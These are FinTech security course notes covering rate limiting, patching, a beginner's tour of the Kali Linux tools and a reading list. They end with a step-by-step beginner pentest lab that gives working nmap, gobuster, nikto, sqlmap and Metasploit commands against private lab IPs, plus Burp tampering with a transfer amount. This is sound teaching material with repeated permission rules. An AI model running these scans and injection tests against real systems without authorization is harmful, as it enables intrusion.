**What is it?**
Prevent brute-force attacks and abuse by **limiting how many times** a user or bot can try something (like login, reset password, OTP request).

### üß± Common defenses:

* **Rate limiting** ‚Äî e.g., max 5 requests/second per IP
* **Account lockout** ‚Äî temporary or permanent block after N failed login attempts
* **Exponential backoff** ‚Äî delay increases after each failed try

### üéØ Why important in FinTech?

* Stops attackers from trying many passwords quickly
* Prevents abuse of APIs (e.g., fraud detection, fund transfers)

üìå **Example (pseudo logic):**

```python
if login_fails > 5 in 10 mins:
    lock_account_temporarily()
```

---

## 7.5 üîÑ Patch and Vulnerability Management

**What is it?**
Keeping systems, libraries, and dependencies **up-to-date** to fix known security flaws (CVEs).

> üí• Many real-world breaches happened because of **unpatched systems**.

### üîß Key components:

* **Inventory of all software & dependencies**
* **Automated vulnerability scanners** (e.g., Nessus, OpenVAS, GitHub Dependabot)
* **Scheduled patch cycles** ‚Äî weekly or monthly
* **Emergency patching process** ‚Äî for critical CVEs (e.g., Log4Shell, Heartbleed)

üìå **Example process:**

1. Detect that `libraryX 1.2` has CVE-2024-1234
2. Test updated version (`1.3`) in staging
3. Deploy to production
4. Log the fix and notify the team

### üõ†Ô∏è Tools:

* For code dependencies:

  * `pip-audit` (Python), `npm audit` (Node), `OWASP Dependency-Check`

* For OS/infra:

  * `apt`, `yum`, `snap`, `unattended-upgrades`

---





---

# üêß Kali Linux ‚Äî Simple Explanation & Most‚ÄëUsed Tools (for absolute beginners)

> **Goal:** give students a gentle, non-technical introduction to Kali Linux and the most common tools they'll see ‚Äî what each tool *does*, why it matters in FinTech, and a tiny, clear example of how it would be used (no commands required to understand).

---

## üîé What is Kali Linux? (one-paragraph, plain language)

Kali Linux is a special version of the Linux operating system that collects many security tools in one place. Think of it like a **toolbox for digital security** ‚Äî it gives security testers safe ways to look for problems in websites, apps, and networks. We **only** use Kali inside a controlled training environment (a virtual machine) and **never** against random websites or people.

---

## ‚ö†Ô∏è Important safety rule (please read)

* **Only test systems you own or have written permission to test.**
* Use Kali in an isolated lab (virtual machine) so you don‚Äôt accidentally affect real services.
* Always follow your course‚Äôs Rules of Engagement (RoE).

---

## üß≠ How to think about the tools (simple analogy)

Imagine a physical bank building:

* Some tools are like **binoculars** (look from afar) ‚Äî these gather public info.
* Some tools are like **door-checkers** ‚Äî they see which doors (ports) are open.
* Some are like **interceptors** ‚Äî they watch network traffic.
* Some are like **locksmith simulators** ‚Äî they try to open weak locks in a safe lab.

---

## üß∞ Main tool categories (very short list)

We‚Äôll describe a few essential tools from each category ‚Äî *what they do in plain language* and *why FinTech people care*.

---

### 1) üîé Information Gathering (find what exists)

**Purpose:** discover what websites, servers, email addresses, or subdomains belong to a company ‚Äî using public information.

* **theHarvester** ‚Äî finds publicly visible emails, subdomains and hostnames (like searching the internet for signs of the bank).

  * *Why care:* finds forgotten admin pages or leaked email lists.
* **amass / subfinder** ‚Äî find subdomains (hidden parts of a website).

  * *Why care:* attackers often find weaker, forgotten sub-sites here.

---

### 2) üåê Network Scanning & Discovery (see open doors)

**Purpose:** check which "doors" (network ports) on a machine are open and what service sits behind them.

* **nmap** ‚Äî scans a host and tells you which ports are open (web server, database, etc.) and often the software name.

  * *Why care for FinTech:* open database ports on the public internet are risky.
* **masscan** ‚Äî very fast scanner for many addresses (used in large labs only).

  * *Why care:* can find wide exposure quickly, but noisy ‚Äî use carefully.
* **netcat (nc)** ‚Äî simple tool to connect to a port to see what it says (a quick, manual check).

  * *Why care:* quick way to peek at a service banner (version info).

---

### 3) üåç Web Application Testing (look at the website behavior)

**Purpose:** inspect and manipulate web traffic and find common web problems.

* **Burp Suite** ‚Äî acts like a middleman between your browser and the website so you can see and change requests (used for manual testing).

  * *Why care:* can reveal login flaws or sensitive data leaks.
* **OWASP ZAP** ‚Äî similar to Burp but free/open-source ‚Äî good for beginners.
* **Nikto** ‚Äî checks web servers for common misconfigurations (like leaving default pages).

  * *Why care:* a misconfigured server can reveal sensitive files or admin pages.
* **gobuster / dirb** ‚Äî tries many common file/folder names to find hidden pages (e.g., `/admin`).

  * *Why care:* attackers use these to find forgotten admin panels.

---

### 4) üí£ Exploitation Frameworks (use only in safe labs)

**Purpose:** demonstrate how a discovered flaw *could* be used ‚Äî only in isolated practice environments.

* **Metasploit** ‚Äî a collection of known exploit tools to safely test vulnerabilities in lab VMs.

  * *Why care:* shows real impact, but must never be used on live systems without permission.
* **searchsploit** ‚Äî searches public exploit databases for known issues.

  * *Why care:* helps match a vulnerability to an actual exploit.

---

### 5) üîê Passwords & Hash Cracking (offline work)

**Purpose:** test how strong passwords are or attempt to recover password equivalents from stored data (only with permission).

* **John the Ripper** ‚Äî tries to guess password hashes using wordlists.
* **Hashcat** ‚Äî like John but faster (can use GPUs).
* **Hydra** ‚Äî tries many passwords against an online service (only on test systems).

  * *Why care:* helps determine if password policies are strong enough.

---

### 6) üêô Packet Capture & Analysis (listen to network traffic)

**Purpose:** capture and inspect raw network messages to see if sensitive data travels unprotected.

* **tcpdump** ‚Äî record raw network packets to a file.
* **Wireshark** ‚Äî GUI tool to inspect packet captures; you can see HTTP requests, login data if not encrypted.

  * *Why care:* shows whether traffic is encrypted (HTTPS) or leaking secrets in clear text.

---

### 7) üì° Wireless & Bluetooth (device-specific)

**Purpose:** test Wi‚ÄëFi and nearby wireless protocols for weaknesses.

* **aircrack-ng** ‚Äî suite for testing Wi‚ÄëFi security (handshake capture and cracking).

  * *Why care for FinTech:* branch Wi‚ÄëFi must be secure to prevent local attacks.

---

### 8) üïµÔ∏è‚Äç‚ôÄÔ∏è Forensics & Evidence (investigations)

**Purpose:** examine disks and memory after an incident (conceptual for beginners).

* **Autopsy / Sleuthkit / Volatility** ‚Äî tools to analyze disk images and memory dumps.

  * *Why care:* used by defenders and investigators after an incident.

---

## ‚úÖ Very short examples (conceptual, no commands required)

* Use **theHarvester** to find public emails ‚Üí you discover an employee support address that could be targeted by phishing.
* Use **nmap** on a lab host ‚Üí you find port 5432 (Postgres DB) open to the internet ‚Üí that's risky.
* Use **Burp Suite** to intercept a login request on a local test site ‚Üí you see session tokens and can test session management safely.
* Use **Wireshark** on a test network ‚Üí you see HTTP data in clear text (means HTTPS is not used properly).

---

## üßæ Simple glossary (one-liners)

* **Port:** a numbered network "door" on a computer (e.g., 80 = web).
* **Banner:** short text many services send when you connect (often shows software + version).
* **Exploit:** code or steps that take advantage of a vulnerability.
* **Hash:** a scrambled fingerprint of a password (not the password itself).
* **Packet:** a small chunk of network traffic ‚Äî the building blocks of internet communication.

---

## üìö Quick learning path for total beginners

1. Learn a few basic Linux commands (open a terminal, list files).
2. Run `nmap` against a **lab VM** like `scanme.nmap.org` or an intentionally vulnerable local VM.
3. Use Wireshark to capture your own HTTP request to a local test page and observe traffic.
4. Open Burp Suite and configure your browser to proxy a test site ‚Äî watch requests move through Burp.
5. Always stop and ask: *do I have permission to run this?* If no ‚Äî do not run it.

---




---

# üìö Week 10 ‚Äî Links & Reading List

## 1) Foundations & Overviews

* **Kali Linux ‚Äî Official documentation (installation, virtualization, safe use)**. Use this to set up your VM and learn safe practices. ([Kali Linux][1])
* **Nmap ‚Äî Official documentation & guide (network scanning basics and options)** ‚Äî the canonical resource for port scanning. ([Nmap][2])
* **Wireshark ‚Äî Official site & downloads (packet capture & analysis)** ‚Äî how to capture, filter and inspect traffic. ([Wireshark][3])
* **Metasploit Framework ‚Äî Official docs / Rapid7 (exploitation framework overview & getting started)**. ([rapid7.github.io][4])

## 2) Security Standards, Law & Compliance (FinTech-focused)

* **PCI Security Standards Council ‚Äî PCI DSS docs & library (payment card security requirements)** ‚Äî required reading for payment systems. ([PCI Security Standards Council][5])
* **GDPR ‚Äî Official European Commission guidance on data protection** (search the EU site for up-to-date guidance). ([OWASP][6])
* **NIST / National Vulnerability Database (NVD)** ‚Äî official government vulnerability repository used for CVE lookup and patch guidance. ([NVD][7])

## 3) OWASP & Web/API Security (FinTech relevance)

* **OWASP Top 10 (web application risks)** ‚Äî baseline for web app security awareness. ([OWASP][8])
* **OWASP API Security Top 10 (2023 edition)** ‚Äî critical for FinTech APIs. ([OWASP][9])
* **OWASP Juice Shop (vulnerable web app for labs)** ‚Äî great safe target covering many OWASP issues. ([GitHub][10])

## 4) Kali + Tool Docs (most used tools & docs)

* **Kali Linux downloads & secure install instructions** (get official ISOs and VM guidance). ([Kali Linux][11])
* **Burp Suite ‚Äî PortSwigger docs & labs** (intercepting proxy, manual testing, hands‚Äëon labs). ([PortSwigger][12])
* **Nmap project home & ScanMe target (test target)** ‚Äî official Nmap site + ‚Äúscanme‚Äù practice host. ([Nmap][13])
* **Wireshark documentation & user guide** (how to install & basic tutorials). ([Wireshark][14])
* **Metasploit resources (Rapid7 docs / Metasploit Unleashed)** ‚Äî exploit development & lab use. ([Metasploit][15])

> Note: For other Kali tools that you‚Äôll cover in class (sqlmap, nikto, gobuster, hydra, john/hashcat, masscan, etc.), Kali docs plus the individual tool repos are the canonical sources ‚Äî Kali docs list packages and tools you can install. ([Kali Linux][1])

## 5) Vulnerability Intelligence & Threat Hunting

* **MITRE ATT&CK ‚Äî Adversary tactics & techniques knowledge base** (useful to map pentest findings to attacker behavior). ([MITRE ATT&CK][16])
* **NVD / CVE lookup (NIST)** ‚Äî search CVE entries and severity scores for vulnerabilities you discover. ([NVD][7])

## 6) Hands‚Äëon Learning & Safe Practice Platforms

* **OWASP Juice Shop ‚Äî hosted demo & GitHub repo** (download and run locally for labs). ([juice-shop.herokuapp.com][17])
* **Damn Vulnerable Web App (DVWA)** ‚Äî classic vulnerable app for beginners (run in lab VM). ([GitHub][18])
* **TryHackMe ‚Äî interactive beginner-friendly labs and guided paths** (great for students). ([TryHackMe][19])
* **Hack The Box ‚Äî advanced practice and CTFs** (classroom or self-study use). ([Hack The Box][20])

## 7) Incident Case Studies & Real FinTech Breaches (learning lessons)

* **Capital One 2019 breach ‚Äî reporting & analysis** ‚Äî useful case study on cloud misconfiguration and lessons learned. ([Axios][21])
* **Robinhood settlements & breach coverage** ‚Äî regulatory outcomes and data exposure lessons relevant to FinTech. ([Financial Times][22])

## 8) Practical Reporting, RoE & Ethical Guidance

* **Kali docs & general-use guidance** ‚Äî has sections about safe operation, non‚Äëdestructive testing and recommended VM usage. ([Kali Linux][23])
* **Burp / PortSwigger labs and documentation** ‚Äî includes safe lab exercises and guidance on interpreting findings. ([PortSwigger][24])

## 9) Supplemental / Further Reading

* **OWASP educational pages and cheat sheets** ‚Äî best-practices and developer-oriented mitigation guides (search OWASP cheat sheets on owasp.org). ([OWASP][6])
* **Books & Guides**: *Nmap Network Scanning* (official Nmap book) ‚Äî great background reading for scanning and interpreting results. ([Nmap][25])

---



[1]: https://www.kali.org/docs/?utm_source=chatgpt.com "Kali Docs | Kali Linux Documentation"
[2]: https://nmap.org/docs.html?utm_source=chatgpt.com "Nmap Documentation - Free Security Scanner For Network ..."
[3]: https://www.wireshark.org/download.html?utm_source=chatgpt.com "Download Wireshark: Your Network Analysis Tool"
[4]: https://rapid7.github.io/metasploit-framework/?utm_source=chatgpt.com "Home | Metasploit Documentation Penetration Testing ..."
[5]: https://www.pcisecuritystandards.org/document_library/?utm_source=chatgpt.com "PCI Security Standards Document Library"
[6]: https://owasp.org/www-project-top-ten/?utm_source=chatgpt.com "OWASP Top Ten"
[7]: https://nvd.nist.gov/?utm_source=chatgpt.com "NVD - Home - National Institute of Standards and Technology"
[8]: https://owasp.org/Top10/?utm_source=chatgpt.com "OWASP Top 10:2021"
[9]: https://owasp.org/API-Security/editions/2023/en/0x00-header/?utm_source=chatgpt.com "OWASP API Security Top 10 2023"
[10]: https://github.com/juice-shop/juice-shop?utm_source=chatgpt.com "OWASP Juice Shop: Probably the most modern and ..."
[11]: https://www.kali.org/docs/introduction/download-official-kali-linux-images/?utm_source=chatgpt.com "Downloading Kali Linux | Kali Linux Documentation"
[12]: https://portswigger.net/burp/documentation?utm_source=chatgpt.com "Burp Suite documentation"
[13]: https://nmap.org/?utm_source=chatgpt.com "Nmap: the Network Mapper - Free Security Scanner"
[14]: https://www.wireshark.org/docs/wsug_html_chunked/ChBuildInstallWinInstall.html?utm_source=chatgpt.com "2.3. Installing Wireshark under Windows"
[15]: https://www.metasploit.com/?utm_source=chatgpt.com "Metasploit | Penetration Testing Software, Pen Testing ..."
[16]: https://attack.mitre.org/?utm_source=chatgpt.com "MITRE ATT&CK¬Æ"
[17]: https://juice-shop.herokuapp.com/?utm_source=chatgpt.com "OWASP Juice Shop"
[18]: https://github.com/digininja/DVWA?utm_source=chatgpt.com "digininja/DVWA: Damn Vulnerable Web Application (DVWA)"
[19]: https://tryhackme.com/resources/blog/free_path?utm_source=chatgpt.com "Free TryHackMe Training: The Ultimate Guide for Beginners"
[20]: https://www.hackthebox.com/?utm_source=chatgpt.com "Hack The Box: The #1 Cybersecurity Performance Center"
[21]: https://www.axios.com/2019/07/29/100-million-credit-card-applications-stolen-from-capital-one?utm_source=chatgpt.com "Data from 100 million credit applications stolen from Capital One"
[22]: https://www.ft.com/content/781f1720-62f9-4aff-9b53-7d036a8f1309?utm_source=chatgpt.com "Robinhood to pay biggest fine among more than $100mn imposed by SEC"
[23]: https://www.kali.org/docs/general-use/?utm_source=chatgpt.com "General Use | Kali Linux Documentation"
[24]: https://portswigger.net/support/using-burp-suite?utm_source=chatgpt.com "Using Burp Suite"
[25]: https://nmap.org/book/toc.html?utm_source=chatgpt.com "Nmap Network Scanning"




---

# üß™ Beginner Pentest Lab

**Goal:** Find one vulnerability on an isolated lab target, show a safe proof‚Äëof‚Äëconcept (PoC), and write a short report with fixes.

**Targets (lab only):** OWASP Juice Shop, Metasploitable, DVWA, or instructor-provided VMs.

**Attacker VM:** Kali Linux (student).

**Do this only in a closed lab network.** ‚úÖ

---

## ‚ö†Ô∏è Before you start ‚Äî Safety rules (READ THIS)

* üîí **Only** test systems you own or have written permission to test.
* üß© Use an **isolated network** (Host‚ÄëOnly / Internal network). No internet exposure.
* üì∏ Take **VM snapshots** before any intrusive steps ‚Äî you will revert if needed.
* üóÇÔ∏è Save all outputs to a folder `~/pentest_lab/artifacts` and **encrypt** when finished.
* üõë If anything looks like real user data, **stop immediately** and notify your instructor.

---

## üß∞ Lab Prep (do these first)

1. üîÅ **Create VMs**

   * Kali VM (attacker), Juice Shop / Metasploitable (targets).
2. üåê **Network**

   * Set VM network to **Host‚ÄëOnly** or **Internal** (so the traffic stays in your computer).
3. üíæ **Snapshot**

   * Take a snapshot of each VM (clean state).
4. üóÉÔ∏è **Artifacts folder**

   * On Kali:

     ```bash
     mkdir -p ~/pentest_lab/artifacts
     chmod 700 ~/pentest_lab/artifacts
     ```
5. ‚úçÔ∏è **Short RoE** (class waiver): instructor authorizes these lab targets for the session.

---

## üîé Phase 1 ‚Äî Reconnaissance (What exists?) üïµÔ∏è‚Äç‚ôÄÔ∏è

**Purpose:** find out what hosts and services exist before touching anything.

### 1.1 Passive recon (low risk) üåç

* Use public info tools (demo only). Example:

  ```bash
  theHarvester -d example.com -b all
  ```
* Save output:

  ```bash
  theHarvester -d example.com -b all > ~/pentest_lab/artifacts/passive_recon.txt
  ```

### 1.2 Active host discovery (ping-scan) üì°

* Find which hosts are up on your lab network:

  ```bash
  nmap -sn 192.168.56.0/24 -oG ~/pentest_lab/artifacts/ping_scan.gnmap
  ```
* **What to look for:** lines showing `Host: 192.168.56.102 ()  Status: Up`

---

## üîç Phase 2 ‚Äî Scanning & Enumeration (Which doors are open?) üö™

**Purpose:** identify open ports and services (web, ssh, database, etc.)

### 2.1 Full port scan (nmap) üß≠

* Run a safe scan (all ports, save outputs):

  ```bash
  nmap -sS -p- -T4 -oA ~/pentest_lab/artifacts/initial_nmap 192.168.56.102
  ```

  * `-sS` = stealth SYN, `-p-` = ports 1‚Äì65535, `-oA` = save in all formats.

### 2.2 Service/version detection üßæ

* Find versions (helps map to known problems):

  ```bash
  sudo nmap -sS -sV -A -p 22,80,443,3000 -oN ~/pentest_lab/artifacts/service_nmap.txt 192.168.56.102
  ```

  * Note software names like `OpenSSH`, `Apache`, `Node.js` + versions.

### 2.3 Quick web check (curl) üåê

* See web headers:

  ```bash
  curl -I http://192.168.56.102:3000
  ```

  * Look for `Server:` header or missing `Strict-Transport-Security`.

### 2.4 Find hidden pages (gobuster) üóÑÔ∏è

* Search for `/admin`, `/backup`, etc.:

  ```bash
  gobuster dir -u http://192.168.56.102:3000 -w /usr/share/wordlists/dirb/common.txt -o ~/pentest_lab/artifacts/gobuster.txt
  ```

### 2.5 Server check (Nikto) üîé

* Scan for server issues:

  ```bash
  nikto -h http://192.168.56.102:3000 -output ~/pentest_lab/artifacts/nikto.txt
  ```

---

## üß≠ Phase 3 ‚Äî Vulnerability Analysis (Which findings matter?) üìä

**Purpose:** review scan outputs and choose a thing to test further.

### 3.1 Read outputs

* Open files in `~/pentest_lab/artifacts` (nmap, nikto, gobuster).
* Mark potential issues: open DB port, admin page with no auth, suspicious parameters.

### 3.2 Prioritize

* High priority = can leak money or PII (e.g., transfer API without auth).
* Medium = internal service exposed but needs effort.
* Low = info only (server strings).

---

## ‚ö†Ô∏è Phase 4 ‚Äî Exploitation (Lab‚Äëonly, proof‚Äëof‚Äëconcept) üîê

**Only proceed if:** target is a lab VM and you have a snapshot.

### 4.1 Intercept web traffic with Burp (manual) üï∏Ô∏è

* Start Burp: `burpsuite` (GUI)
* Set browser proxy to `127.0.0.1:8080` and browse the lab site.
* **Intercept** a login or transfer request, change a field (e.g., `amount=10 ‚Üí 1000`) and forward request.
* **Evidence:** screenshot of changed request and resulting response.

### 4.2 Test SQL injection with sqlmap (lab only) üß™

* If you see a parameter like `?id=5`:

  ```bash
  sqlmap -u "http://192.168.56.102:3000/product?id=5" --batch --output-dir=~/pentest_lab/artifacts/sqlmap
  ```
* **Note:** only test on lab VM and limit what you dump.

### 4.3 (Optional) Metasploit demo ‚Äî safe exploit in VM ‚öôÔ∏è

* Start DB and console:

  ```bash
  sudo msfdb init
  msfconsole
  ```
* Use a tested exploit module against an intentionally vulnerable target. **Always revert snapshot after.**

---

## üßπ Phase 5 ‚Äî Post‚ÄëExploitation & Cleanup (Be tidy!) üßº

### 5.1 Save evidence

* Examples to keep in `~/pentest_lab/artifacts`:

  * `initial_nmap.*`, `service_nmap.txt`
  * `nikto.txt`, `gobuster.txt`
  * Burp exported request/response (sanitized)
  * `sqlmap` outputs (lab only)
  * `capture.pcap` (see below)

### 5.2 Capture network traffic (pcap) üêô

* Save a short capture of relevant traffic:

  ```bash
  sudo timeout 30 tcpdump -i eth0 host 192.168.56.102 -w ~/pentest_lab/artifacts/capture.pcap
  ```
* Open `capture.pcap` in Wireshark to inspect.

### 5.3 Cleanup & revert

* Remove any files you uploaded to target VM.
* Revert target VM to snapshot to restore clean state.
* Zip & encrypt your artifacts:

  ```bash
  cd ~/pentest_lab
  zip -e artifacts.zip artifacts/*
  ```

---

## üìù Phase 6 ‚Äî Reporting (What to submit) üèÅ

**Each student/team should submit:**

1. **Encrypted artifacts.zip** (contains scan outputs, Burp exports, pcap).
2. **One‚Äëpage Executive Summary** (non‚Äëtechnical): top risk, impact, one recommended fix.
3. **Full Technical Finding** (for the vulnerability you proved): use the template below.

### üìÑ Finding Template (copy & fill)

* **Title:** e.g., *IDOR in /api/transfer*
* **Target:** IP / Host (lab)
* **Severity:** High / Medium / Low (explain why)
* **Plain-English description:** What happened, in one sentence.
* **PoC (safe steps):** Minimal steps to reproduce in the lab (include sanitized request).
* **Impact:** What an attacker could do (money theft, data leak).
* **Remediation:** Concrete fix (server-side auth checks, parameter validation, rate limiting).
* **Retest:** How to verify fix (e.g., perform same PoC ‚Äî should return 403).

**Example snippet:**

```
Title: IDOR on POST /api/transfer
Target: 192.168.56.102 (Juice Shop)
Severity: High
Description: Changing the `toAccount` parameter allowed transferring funds to another user while authenticated as the victim.
PoC:
  1. Login as user A.
  2. Intercept request and change toAccount=A2.
  3. Server returned 200 OK and transfer logged.
Impact: Unauthorized funds transfer.
Remediation: Add server-side check that token owner owns fromAccount; log and alert large transfers.
```

---

## ‚úÖ Lab Deliverables (for instructors)

* `artifacts.zip` (encrypted)
* Executive summary (PDF)
* One detailed finding report (Markdown or DOCX)
* Short reflection: what went well, what was surprising

---

## üìö Helpful Tips & Quick Glossary (students)

* **Port:** numbered door on a computer (80 = web). üö™
* **Banner:** short info service gives when you connect ‚Äî often shows software version. ü™ß
* **PoC:** proof‚Äëof‚Äëconcept ‚Äî simple demo that a vulnerability exists. üì∏
* **PCAP:** packet capture file ‚Äî recorded network traffic. üêô
* **Snapshot:** saved VM state you can roll back to. ‚èÆÔ∏è

---

## ‚úÖ Final Safety Reminder (again!)

* If you **did not** create or own the target, **do not** run this lab.
* Keep instructor contact ready. If you find something that looks real (PII, real payments), pause and inform the instructor immediately.

---
